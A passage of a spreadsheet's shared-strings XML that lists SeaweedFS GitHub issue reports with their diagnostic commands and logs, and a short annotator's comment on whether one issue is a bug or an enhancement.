    <t xml:space="preserve">Hi, I have 3 volume servers and 1 master node, I've created a collection name "Animated_2tacopy_count" with count=1 and replication=001 I upload my file with following command:  sweed@dev10:~$./weedfs/weed upload -collection=Animated_2tacopy_count=1 -dir="/home/sweed/animate.mp4 [{"fileName":"animate.mp4","fileUrl":"192.168.200.23:8081/22,1d9ff15aa7","fid":"22,1d9ff15aa7","size":178481324}]  when I'm asking Master for my file, it return volume servers randomly:  sweed@dev10:~$ curl -I 192.168.200.20:9333/22,24dbfea5ed HTTP/1.1 308 Permanent Redirect Content-Type: text/html; charset=utf-8 Location: http://192.168.200.21:8081/22,24dbfea5ed Date: Thu, 31 Dec 2020 15:06:08 GMT sweed@dev10:~$ curl -I 192.168.200.20:9333/22,24dbfea5ed HTTP/1.1 308 Permanent Redirect Content-Type: text/html; charset=utf-8 Location: http://192.168.200.22:8081/22,24dbfea5ed Date: Thu, 31 Dec 2020 15:06:09 GMT  But in browser I can't see my file from volume serevr 192.168.200.21 but In another volume server "192.168.200.22" everything is ok, actully when browser returns the ip address of 200.22 I can see my file but when it return 200.21 I have mime type error: ![image](https://user-images.githubusercontent.com/43205944/103415573-0111fb80-4b98-11eb-9c53-568dab440166.png) And in journalctl of server 200.21 I have this error:  Dec 31 18:23:50 dev11 seaweedfs-volume[20791]: I1231 18:23:50 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:25:30 dev11 seaweedfs-volume[20791]: I1231 18:25:30 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:25:37 dev11 seaweedfs-volume[20791]: I1231 18:25:37 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:25:48 dev11 seaweedfs-volume[20791]: I1231 18:25:48 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:26:29 dev11 seaweedfs-volume[20791]: I1231 18:26:29 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:26:40 dev11 seaweedfs-volume[20791]: I1231 18:26:40 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:26:42 dev11 seaweedfs-volume[20791]: I1231 18:26:42 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:26:43 dev11 seaweedfs-volume[20791]: I1231 18:26:43 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value Dec 31 18:27:03 dev11 seaweedfs-volume[20791]: I1231 18:27:03 20791 volume_server_handlers_read.go:187] load chunked manifest (/22,24dbfea5ed) error: invalid character '\x1f' looking for beginning of value </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1776</t>
  </si>
  <si>
    <t>S3 should return 204 on DELETE to nonexistent file (not 404)</t>
  </si>
  <si>
    <t>**Describe the bug** The Amazon S3 api specification states that a DELETE request to a non-existing file should return HTTP status `HTTP/1.1 204 No Content`, as described [here](https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteObject.html). Currently, seaweedfs S3 implementation returns `404 Not Found`. **System Setup** - List the command line to start: `./weed server -s3 -s3.config=config.json -dir="/minio/weed" -volume.max=100` - OS version: `CentOS 8` - output of `weed version`: `version 30GB 2.23 318a3d2 linux amd64` **Expected behavior** Seaweedfs should follow the Amazon S3 API specification and return HTTP 204 status-code when issuing a DELETE request to a non-existing file. This is important for compatibility with applications expecting S3 behavior. **Additional context** I stumbled upon this problem when attempting to use [pgbackrest](https://pgbackrest.org/) postgres backup software configured with seaweedfs S3 API as storage. When performing a regular backup, pgbackrest would almost finish but at the end run into an exception:  2021-02-02 16:04:39.364 P00 DEBUG: common/io/http/request::httpRequestResponse: =&gt; {code: 404, reason: Not Found, header: {accept-ranges: 'bytes', content-length: '234', content-type: 'application/xml', date: 'Tue, 02 Feb 2021 15:04:39 GMT', server: 'SeaweedFS S3 30GB 2.23', x-amz-request-id: '1612278279364142795'}, contentChunked: false, contentSize: 234, contentRemaining: 0, closeOnContentEof: false, contentExists: true, contentEof: true, contentCached: true} 2021-02-02 16:04:39.365 P00 DEBUG: common/exit::exitSafe: (result: 0, error: true, signalType: 0) ERROR: [039]: HTTP request failed with 404 (Not Found):  URI/Query : /dev-pgbackrest/backup/dev-pg-f3c001/latest  Request Headers : authorization: &lt;redacted&gt; content-length: 0 host: dev-seaweed-backup001-vip.&lt;redacted&gt; x-amz-content-sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date: &lt;redacted&gt;  Response Headers : accept-ranges: bytes content-length: 234 content-type: application/xml date: Tue, 02 Feb 2021 15:04:39 GMT server: SeaweedFS S3 30GB 2.23 x-amz-request-id: 1612278279364142795  Response Content : &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;Error&gt;&lt;Code&gt;NoSuchKey&lt;/Code&gt;&lt;Message&gt;The specified key does not exist.&lt;/Message&gt;&lt;Resource&gt;/dev-pgbackrest/backup/dev-pg-f3c001/latest&lt;/Resource&gt;&lt;RequestId&gt;1612278279364119515&lt;/RequestId&gt;&lt;/Error&gt;  Searching for this error came up with this pgbackrest bug; https://github.com/pgbackrest/pgbackrest/issues/985 which details the same problem of an S3 implementation returning 404 for DELETE. I think this problem stems from issue #1160 where it was incorrectly stated that the API should return 404 in this case. Please let me know if I can provide additional information!</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1808</t>
  </si>
  <si>
    <t>Jwt issue - wrong jwt</t>
  </si>
  <si>
    <t>**Describe the bug** Getting wrong jwt code from master.  C:\Users\lennie&gt;curl -i "http://172.16.100.1:9351/dir/lookup?volumeId=1,18ee7f3466&amp;read=yes" HTTP/1.1 200 OK Authorization: BEARER eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaWQiOiIiLCJleHAiOjE2MTM1MTI0NDN9.AxGUN17e_RZ5g4tSZLFWfzqnIuYQqxDCMBPTxvnFpdk Content-Type: application/json Date: Tue, 16 Feb 2021 21:52:03 GMT Content-Length: 90 {"volumeId":"1","locations":[{"url":"172.16.100.1:9831","publicUrl":"172.16.100.1:9831"}]}  And then volume query.  C:\Users\lennie&gt;curl -i "http://172.16.100.1:9831/1,18ee7f3466" -H "Authorization: BEARER eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaWQiOiIiLCJleHAiOjE2MTM1MTI0NDN9.AxGUN17e_RZ5g4tSZLFWfzqnIuYQqxDCMBPTxvnFpdk" HTTP/1.1 401 Unauthorized Content-Type: application/json Server: SeaweedFS Volume 30GB 2.26 Date: Tue, 16 Feb 2021 21:52:27 GMT Content-Length: 21 {"error":"wrong jwt"}  I Have read issue https://github.com/chrislusf/seaweedfs/issues/1399 But i only have one server and the time is correct on the system. When i do some request to the master to get the jwt token i can se this.  curl -i "http://172.16.100.1:9351/dir/lookup?volumeId=1,18ee7f3466&amp;read=yes"  Jwt response.  Authorization: BEARER eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaWQiOiIiLCJleHAiOjE2MTM1MTM2MTN9.VfbCVHEhBMHMxWZrTpzOTYSU8DqWtKGs5_vaopdLiwY Authorization: BEARER eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaWQiOiIiLCJleHAiOjE2MTM1MTM2MTd9.9yPL3dNuW3J4p68KARMWIAp_XlqDYkAN-NHHnYUrY4Q Authorization: BEARER eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaWQiOiIiLCJleHAiOjE2MTM1MTM2MjB9.crUaZYFBCEDu57dOKAE-rJPw5nS-fpJP11Oz6Bv0Pok Authorization: BEARER eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaWQiOiIiLCJleHAiOjE2MTM1MTM2MjF9.mRJQ0WtXu5JNfPAKIGiJP0CGrodiM_i8tOws9H7PRdA  There should not be underscore or dash in the base64 encoded values? So the question is. Why do I get underscores? I am running: OS: Ubuntu 18.04.4 LTS And weed version : version 30GB 2.26 b9b5b932 linux amd64 The Master is starting whit this command.  weed master -mdir="/home/raid6/seaweed/mastershare" -ip="172.16.100.1" -ip.bind="172.16.100.1" -port=9351  Log  I0216 22:42:56 19422 file_util.go:23] Folder /home/raid6/seaweed/mastershare Permission: -rwxr-xr-x I0216 22:42:56 19422 master.go:168] current: 172.16.100.1:9351 peers: I0216 22:42:56 19422 master_server.go:107] Volume Size Limit is 30000 MB I0216 22:42:56 19422 master_server.go:192] adminScripts: I0216 22:42:56 19422 master.go:122] Start Seaweed Master 30GB 2.26 b9b5b932 at 172.16.100.1:9351 I0216 22:42:56 19422 raft_server.go:70] Starting RaftServer with 172.16.100.1:9351 I0216 22:42:56 19422 raft_server.go:129] current cluster leader: I0216 22:42:56 19422 master.go:146] Start Seaweed Master 30GB 2.26 b9b5b932 grpc server at 172.16.100.1:19351 I0216 22:42:57 19422 masterclient.go:78] No existing leader found! I0216 22:42:57 19422 raft_server.go:154] Initializing new cluster I0216 22:42:57 19422 master_server.go:141] leader change event: =&gt; 172.16.100.1:9351 I0216 22:42:57 19422 master_server.go:143] [ 172.16.100.1:9351 ] 172.16.100.1:9351 becomes leader. I0216 22:43:00 19422 master_grpc_server.go:252] + client filer@172.16.100.1:8888 I0216 22:43:01 19422 masterclient.go:126] redirected to leader 172.16.100.1:9351 I0216 22:43:01 19422 master_grpc_server.go:252] + client master@172.16.100.1:37496 I0216 22:43:04 19422 node.go:322] topo adds child soder I0216 22:43:04 19422 node.go:322] topo:soder adds child r1u1 I0216 22:43:04 19422 node.go:322] topo:soder:r1u1 adds child 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:71] added volume server 172.16.100.1:9831 I0216 22:43:04 19422 volume_layout.go:354] Volume 13 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 10 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 8 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 7 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 6 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 3 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 1 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 11 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 2 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 12 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 5 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 4 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 9 becomes writable I0216 22:43:04 19422 volume_layout.go:354] Volume 14 becomes writable I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 13 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 10 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 8 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 7 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 6 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 3 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 1 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 11 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 2 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 12 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 5 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 4 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 9 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:112] master see new volume 14 from 172.16.100.1:9831 I0216 22:43:04 19422 master_grpc_server.go:157] master send to filer@172.16.100.1:8888: url:"172.16.100.1:9831" public_url:"172.16.100.1:9831" new_vids:13 new_vids:10 new_vids:8 new_vids:7 new_vids:6 new_vids:3 new_vids:1 new_vids:11 new_vids:2 new_vids:12 new_vids:5 new_vids:4 new_vids:9 new_vids:14 data_center:"soder" I0216 22:43:04 19422 master_grpc_server.go:157] master send to master@172.16.100.1:37496: url:"172.16.100.1:9831" public_url:"172.16.100.1:9831" new_vids:13 new_vids:10 new_vids:8 new_vids:7 new_vids:6 new_vids:3 new_vids:1 new_vids:11 new_vids:2 new_vids:12 new_vids:5 new_vids:4 new_vids:9 new_vids:14 data_center:"soder"  The volume is starting whit this command.  root@spinky:/home/raid6/seaweed# weed volume -max=100 -ip="172.16.100.1" -ip.bind="172.16.100.1" -port=9831 -mserver="172.16.100.1:9351" -dir="/home/raid6/seaweed/voltesting" -dataCenter="soder" -rack="r1u1"  Log  I0216 22:25:09 9983 file_util.go:23] Folder /home/raid6/seaweed/voltesting Permission: -rwxr-xr-x I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/2.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/filestorage_12.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/5.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/3.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/1.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/7.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/6.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/4.idx to memory I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/2.dat, replicaPlacement=000 v=3 size=8 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/3.dat, replicaPlacement=000 v=3 size=8 ttl= I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/filestorage_10.idx to memory I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/7.dat, replicaPlacement=000 v=3 size=8 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/filestorage_12.dat, replicaPlacement=000 v=3 size=1864 ttl= I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/filestorage_13.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/filestorage_11.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/filestorage_8.idx to memory I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/filestorage_14.idx to memory I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/4.dat, replicaPlacement=000 v=3 size=8 ttl= I0216 22:25:09 9983 volume_loading.go:127] loading index /home/raid6/seaweed/voltesting/filestorage_9.idx to memory I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/1.dat, replicaPlacement=000 v=3 size=112 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/5.dat, replicaPlacement=000 v=3 size=104 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/6.dat, replicaPlacement=000 v=3 size=8 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/filestorage_10.dat, replicaPlacement=000 v=3 size=7900832 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/filestorage_13.dat, replicaPlacement=000 v=3 size=720 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/filestorage_9.dat, replicaPlacement=000 v=3 size=8 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/filestorage_11.dat, replicaPlacement=000 v=3 size=664 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/filestorage_8.dat, replicaPlacement=000 v=3 size=1600 ttl= I0216 22:25:09 9983 disk_location.go:133] data file /home/raid6/seaweed/voltesting/filestorage_14.dat, replicaPlacement=000 v=3 size=30789912 ttl= I0216 22:25:09 9983 disk_location.go:175] Store started on dir: /home/raid6/seaweed/voltesting with 14 volumes max 100 I0216 22:25:09 9983 disk_location.go:178] Store started on dir: /home/raid6/seaweed/voltesting with 0 ec shards I0216 22:25:09 9983 volume_grpc_client_to_master.go:52] Volume server start with seed master nodes: [172.16.100.1:9351] I0216 22:25:09 9983 volume.go:351] Start Seaweed volume server 30GB 2.26 b9b5b932 at 172.16.100.1:9831 I0216 22:25:09 9983 volume_grpc_client_to_master.go:114] Heartbeat to: 172.16.100.1:9351  This is the Log in volume when wrong jwt  I0216 22:27:26 9983 common.go:53] response method:GET URL:/1,18ee7f3466 with httpStatus:401 and JSON:{"error":"wrong jwt"} I0216 22:27:27 9983 common.go:53] response method:GET URL:/1,18ee7f3466 with httpStatus:401 and JSON:{"error":"wrong jwt"} I0216 22:28:32 9983 common.go:53] response method:GET URL:/1,18ee7f3466 with httpStatus:401 and JSON:{"error":"wrong jwt"} I0216 22:28:34 9983 common.go:53] response method:GET URL:/1,18ee7f3466 with httpStatus:401 and JSON:{"error":"wrong jwt"}  Security.toml file syntax:  # Put this file to one of the location, with descending priority # ./security.toml # $HOME/.seaweedfs/security.toml # /etc/seaweedfs/security.toml # this file is read by master, volume server, and filer # the jwt signing key is read by master and volume server. # a jwt defaults to expire after 10 seconds. [jwt.signing] key = "NotShownToThePublic" expires_after_seconds = 120 # seconds 10 default # jwt for read is only supported with master+volume setup. Filer does not support this mode. [jwt.signing.read] key = "NotShownToThePublic" expires_after_seconds = 120 # seconds # volume server also uses grpc that should be secured. # all grpc tls authentications are mutual # the values for the following ca, cert, and key are paths to the PERM files. # the host name is not checked, so the PERM files can be shared. [grpc] ca = "/home/certstrap/certstrap/out/smtCertAuth.crt" [grpc.volume] cert = "/home/certstrap/certstrap/out/volume01.crt" key = "/home/certstrap/certstrap/out/volume01.key" [grpc.master] cert = "/home/certstrap/certstrap/out/master01.crt" key = "/home/certstrap/certstrap/out/master01.key" [grpc.filer] cert = "/home/certstrap/certstrap/out/filer01.crt" key = "/home/certstrap/certstrap/out/filer01.key" # use this for any place needs a grpc client # i.e., "weed backup|benchmark|filer.copy|filer.replicate|mount|s3|upload" [grpc.client] cert = "/home/certstrap/certstrap/out/client01.crt" key = "/home/certstrap/certstrap/out/client01.key"  If I turn of the security (jwt). The server is working perfect. I can save, show, delete object</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1838</t>
  </si>
  <si>
    <t>[s3] http: superfluous response.WriteHeader</t>
  </si>
  <si>
    <t>**Describe the bug** [s3] http: superfluous response.WriteHeader after `raft.Server: Not current leader` per request  I0225 09:43:38 1 masterclient.go:120] filer masterClient failed to receive from fast-master-0.s3-fast-master-direct.service.dcix.consul:9333: rpc error: code = Unavailable desc = transport is closing 2021/02/25 09:43:38 http: superfluous response.WriteHeader call from github.com/chrislusf/seaweedfs/weed/server.processRangeRequest (common.go:283) E0225 09:43:38 1 filer_server_handlers_write.go:42] failing to assign a file id: failed to parse master : server should have hostname:port format: I0225 09:43:38 1 common.go:53] response method:PUT URL:/buckets/registry/docker/registry/v2/repositories/b2c/credits-admin/_uploads/71e12cb4-5c6e-405e-a6ca-1d491ec79441/hashstates/sha256/15728640 with httpStatus:500 and JSON:{"error":"failed to parse master : server should have hostname:port format: "} E0225 09:43:38 1 s3api_object_handlers.go:330] upload to filer error: failed to parse master : server should have hostname:port format: 2021/02/25 09:43:38 http: superfluous response.WriteHeader call from github.com/chrislusf/seaweedfs/weed/server.processRangeRequest (common.go:283) 2021/02/25 09:43:38 http: superfluous response.WriteHeader call from github.com/chrislusf/seaweedfs/weed/server.processRangeRequest (common.go:283)  https://github.com/chrislusf/seaweedfs/blob/master/weed/server/common.go#L284 **Expected behavior** automatic recovery after loss of master If there is no content, the S3 API returns 200 and 206 codes, need return 500</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1884</t>
  </si>
  <si>
    <t>S3 upload failed for filenames including '%' character</t>
  </si>
  <si>
    <t xml:space="preserve">**Describe the bug** S3 filer API can't handle files with '%' sign despite it being the valid name (and valid object for s3 and minio, I found plenty of those inside Photo library on Mac):  touch %%test.file.txt touch %%test.file.txt aws --endpoint-url http://rpi4node3:8333/ s3 cp %test.file.txt s3://testbucket/ upload failed: ./%test.file.txt to s3://testbucket/%test.file.txt An error occurred (InternalError) when calling the PutObject operation (reached max retries: 2): We encountered an internal error, please try again.  Upload via weed upload works:  &gt; weed upload -master="rpi4node3:9333" %%test.file.txt [{"fileName":"%%test.file.txt","url":"rpi4node3:8088/13,022beaf4f28a09","fid":"13,022beaf4f28a09"}] &gt; weed upload -master="rpi4node3:9333" %test.file.txt [{"fileName":"%test.file.txt","url":"rpi4node3:8088/6,022beb5bdfd3a2","fid":"6,022beb5bdfd3a2"}]  **System Setup** Master started with:  ~/go/bin/weed server -filer -s3 -ip=rpi4node3 -volume.max=0,0 -master.volumeSizeLimitMB=1024 -volume.port=8088 -dir=/mnt/usbslow/weed,/mnt/usbfast/weed/ -master.dir=/mnt/usbfast/weed/master  Filer config:  [redis_cluster2] enabled = true addresses = [ "rpi4node1:6379", "rpi4node2:6379", "rpi4node3:6379" ] password = "" # allows reads from slave servers or the master, but all writes still go to the master readOnly = false # automatically use the closest Redis server for reads routeByLatency = false # This changes the data layout. Only add new directories. Removing/Updating will cause data loss. superLargeDirectories = []  Volumes:  /usr/local/bin/weed volume -mserver="rpi4node3:9333" -max=1000,1000 -port=8088 -disk=hdd,ssd -dir=/mnt/usbslow/weed,/mnt/usbfast/weed/ &amp;  Master weed version:  ~/go/bin/weed version version 30GB 2.29 400de380 linux arm64  Complied from:  commit 400de380f48c44c7700fdf7e8f247bf856662c10 (HEAD -&gt; master, origin/master, origin/HEAD) Author: Chris Lu &lt;chris.lu@gmail.com&gt; Date: Fri Mar 5 02:29:38 2021 -0800 volume server: support tcp direct put/get/delete  **Expected behavior** Successful upload of files via S3. **Additional context** You guessed seaweed fs runs on RPI4 cluster. I found it's a really amazing project and very easy to setup. </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1917</t>
  </si>
  <si>
    <t>[s3] aws s3 copy dir/ fatal error: 'ContentLength'</t>
  </si>
  <si>
    <t>**Describe the bug**  aws --profile local --endpoint http://127.0.0.1:8333/ s3 cp s3://test/dir /tmp/ fatal error: An error occurred (404) when calling the HeadObject operation: Key "dir" does not exist aws --profile local --endpoint http://127.0.0.1:8333/ s3 cp s3://test/dir/ /tmp/ fatal error: 'ContentLength'  **System Setup** `2.34` **Expected behavior** return 404</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1988</t>
  </si>
  <si>
    <t>Upload file fail via filer WebUI</t>
  </si>
  <si>
    <t>**Describe the bug** When "window.location.href" is a directory and without ending of "/",upload file will get a reponse {"error":"update entry /xxx/yyy: existing /xxx/yyy is a directory"} directory url like /xxx/yyy/ can be uploaded successfully **Expected behavior** File uploaded. **Additional context** https://github.com/chrislusf/seaweedfs/blob/c42b95c596f762dcca2bc9c7e7a918ab8ca8b206/weed/server/filer_ui/templates.go#L185</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1999</t>
  </si>
  <si>
    <t>[export] huge error output for non-existent volumeId</t>
  </si>
  <si>
    <t>**Screenshots** &lt;img width="1442" alt="Screenshot 2021-04-14 at 18 22 40" src="https://user-images.githubusercontent.com/9688322/114702666-8f2c7f00-9d4e-11eb-94e0-dccba0df3605.png"&gt;</t>
  </si>
  <si>
    <t>not an ehnacemnt , and bug related to api becuse it just "data file /tmp/1.dat does not exist" screenshot has edidace of calling any endpoint</t>
  </si>
  <si>
    <t>enhanecment because the user is asking to update the error message reporting and not fixing the error</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2039</t>
  </si>
  <si>
    <t>Unexpected response to s3 GET call on non-existent bucket</t>
  </si>
  <si>
    <t>**Describe the bug** Running a "GET /nonexistent-bucket?acl" - which is what a number of libraries use for "does this bucket exist" call, returns a ListBucketResult. According to S3 api docs, it should return a 'AccessControlPolicy' or at least a 404 for the nonexistent resource. **System Setup** docker run -p 8333:8333 chrislusf/seaweedfs server -s3  nneul@optic:~ $ curl http://localhost:8333/nonexistent-bucket?acl &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"&gt;&lt;Name&gt;nonexistent-bucket&lt;/Name&gt;&lt;Prefix&gt;&lt;/Prefix&gt;&lt;Marker&gt;&lt;/Marker&gt;&lt;MaxKeys&gt;10000&lt;/MaxKeys&gt;&lt;IsTruncated&gt;false&lt;/IsTruncated&gt;&lt;/ListBucketResult&gt;  **Expected behavior** AccessControlPolicy in response - even if it's a dummy/empty policy document, or a 404 or other error indicating it couldn't handle the request due to the bucket not being there.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2065</t>
  </si>
  <si>
    <t>docker-registry with seaweedfs weed mount has error</t>
  </si>
  <si>
    <t>**Describe the bug** docker-registry with seaweedfs weed mount, push image error **System Setup** - List the command line to start "weed master", "weed volume", "weed filer", "weed s3", "weed mount".  # setup master weed master -port=9333 -mdir=/tmp/master0 -defaultReplication=000 -ip=localhost # setup volume weed volume -port=8080 -dir=/tmp/volume0 -ip=localhost -mserver=localhost:9333 # setup filer weed filer -port=8888 -ip=localhost -master=localhost:9333 #weed mount weed mount -filer=localhost:8888 -cacheCapacityMB=0 -cacheDir=/tmp/cache001 -dir=/root/mnt #setup docker-registry docker run -p 5001:5000 --rm \ --name registry2 \ -v /root/config.yml:/etc/docker/registry/config.yml -v /root/mnt/data:/data registry:2 #push image root@qa-4:~# docker push 10.10.10.224:5001/ubuntu:16.04 The push refers to repository [10.10.10.224:5001/ubuntu] 1a1a19626b20: Pushing [&gt;] 3.072kB 5b7dc8292d9b: Pushing 11.78kB bbc674332e2e: Pushing [&gt;] 15.87kB da2785b7bb16: Pushing [&gt; ] 525.3kB/130.7MB unknown blob  - OS version `Ubuntu 18.04.4 LTS` - output of `weed version` `version 30GB 2.41 8618526 linux amd64` - if using filer, show the content of `filer.toml` default /root/config.yaml(without cache)  version: 0.1 log: fields: service: registry storage: # cache: # blobdescriptor: inmemory filesystem: rootdirectory: /data http: addr: :5000 headers: X-Content-Type-Options: [nosniff] health: storagedriver: enabled: true interval: 10s threshold: 3  **Expected behavior** push &amp; pull image successfully **Screenshots** ![image](https://user-images.githubusercontent.com/28077875/117948127-6abec500-b343-11eb-8a4e-c6a2e81281c0.png) **Additional context** mastervolumefiler and weed mount had no related warning and error log. if use local filesystem, everything is fine. if `/root/configy.yaml` enable cache:  version: 0.1 log: fields: service: registry storage: cache: blobdescriptor: inmemory filesystem: rootdirectory: /data http: addr: :5000 headers: X-Content-Type-Options: [nosniff] health: storagedriver: enabled: true interval: 10s threshold: 3  then, push image can be successful, but pull image will error(some small images pull many times will eventually succeedbut large images will not): **pull big images**: btw, the test image can be pulled down from dockerhub(`docker pull jupyter/tensorflow-notebook:ubuntu-20.04`) ![image](https://user-images.githubusercontent.com/28077875/117952978-444f5880-b348-11eb-92f2-09cca527e42e.png) ![image](https://user-images.githubusercontent.com/28077875/117953890-0f8fd100-b349-11eb-846c-be53c01e471a.png) At this time, if stop registry and restart it, then pull image is ok. restart registry use same command:  docker run -p 5001:5000 --rm \ --name registry2 \ -v /root/config.yml:/etc/docker/registry/config.yml -v /root/mnt/data:/data registry:2  **pull small image**(pull many times, eventually succeed): ![image](https://user-images.githubusercontent.com/28077875/117951873-2c2b0980-b347-11eb-98f7-26cb4a7d8508.png) BTW, `version 30GB 2.28 37f104f linux amd64` version does not seem to have the above problem.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/2125</t>
  </si>
  <si>
    <t>[filer] Error delete many files with SQL</t>
  </si>
  <si>
